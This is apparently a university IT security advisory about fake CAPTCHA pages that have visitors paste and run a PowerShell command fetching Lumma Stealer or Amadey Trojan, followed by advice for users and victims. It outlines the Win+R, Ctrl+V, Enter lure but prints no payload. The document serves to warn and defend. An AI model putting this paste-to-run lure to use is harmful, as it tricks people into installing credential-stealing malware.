Fake CAPTCHA initiates malware

Summary

Threat actors are distributing malware through fake CAPTCHA tests (security challenges that distinguish between humans and bots by selecting the correct objects in an image). The threat actor tricks website visitors into executing malicious code on their device by following the instructions in the CAPTCHA. This code downloads and executes malware from a malicious site. The fake CAPTCHA has been found to deliver the Lumma stealer and Amadey Trojan, which can steal passwords, cookies, and cryptocurrency wallet details from a user’s device.  

Description

The malware is distributed through fake CAPTCHAs with instructions. Clicking the “I’m not a robot” button copies a PowerShell script to the clipboard and displays so-called “verification steps” that include:

  • Press Win + R (this opens the Run dialog box);
  • Press CTRL + V (this pastes the line from the clipboard into the text field);
  • Press Enter (this executes the code).

The PowerShell script will retrieve a Windows EXE for malware such as the Lumma Stealer and Amadey Trojan.

Threats

Lumma stealer and Amadey Trojan malware can steal passwords, cookies, and cryptocurrency wallet details from a user’s PC.

Technical Details

This attack is spread through malicious content injected into victimized/compromised websites (as appears to be the case with the Michigan Chronicle website), ads accepted by the site targeted, or contributed content hosted on the site.

Detection

Example

The fake CAPTCHA has been found on the Michigan Chronicle site. They can be found on any ordinary website through ads accepted by the site or by other compromised content. When interacting with this compromised content, you may see the following:

Information for Users

To protect yourself from Lumma Stealer and other malware threats, be cautious of suspicious CAPTCHA pages. If you encounter a CAPTCHA page that seems out of place or unusual, it is best to avoid interacting with it.

Remember:

  • Legitimate CAPTCHA pages are usually found on websites that require user verification, such as login or account creation pages.
  • Be cautious of CAPTCHA pages that appear on unexpected websites or in applications.
  • Always check the website's URL to ensure it is legitimate.
  • Keep your software and operating system up to date to patch vulnerabilities that could be exploited by malware.

If you visit a site where you are presented with the fake CAPTCHA:

  • Take a screenshot of the CAPTCHA and report the page you were visiting to [email protected].
  • If you got to the site by clicking a link in an email, also forward the email to [email protected].

If you fall for the scam:

Note: The following steps only need to be taken if you followed the Windows key cut/paste CAPTCHA instructions.  Simply visiting a site where you saw the CAPTCHA or clicking the “Verify you're human checkbox” will not install the malware. 

  • As a precaution, change any passwords you entered when you responded to the fake CAPTCHA. To do so, use a different device that did not install the malware.
  • Is it a UM-owned device? Turn it off, report the incident, and get a loaner from your unit IT department. 
  • Is it a personally-owned device? Consider the Virus Scanning & Removal service offered by ITS Tech Repair.
  • Individuals who have fallen victim to one of these scams, which resulted in loss of money, should contact the University of Michigan Police Department at 734-763-1131 or text 377911.

If you believe that your U-M computer has been infected or compromised by viruses or malware, please contact IT support: For MiWorkspace Computers, contact the ITS Service Center, and for other university-owned computers contact your unit IT department.

In general, the best protection for your devices is this: keep your software and apps up-to-date, do not click suspicious links in email, do not open shared documents or email attachments unless you are expecting them and trust the person who sent them, and only use secure, trusted networks. For more information, see Phishing & ScamsSecure Your Devices, and Secure Your Internet Connection on the U-M Safe Computing website.

How We Protect U-M

ITS provides CrowdStrike Falcon to units, which should be installed on all U-M owned systems (Windows, macOS, and Linux operating systems, whether workstations or servers). Falcon administrators in ITS and in U-M units use the Falcon console to investigate and remediate issues.

Questions, Concerns, Reports

Please contact ITS Information Assurance through the ITS Service Center.

Sincerely,

ITS Information Assurance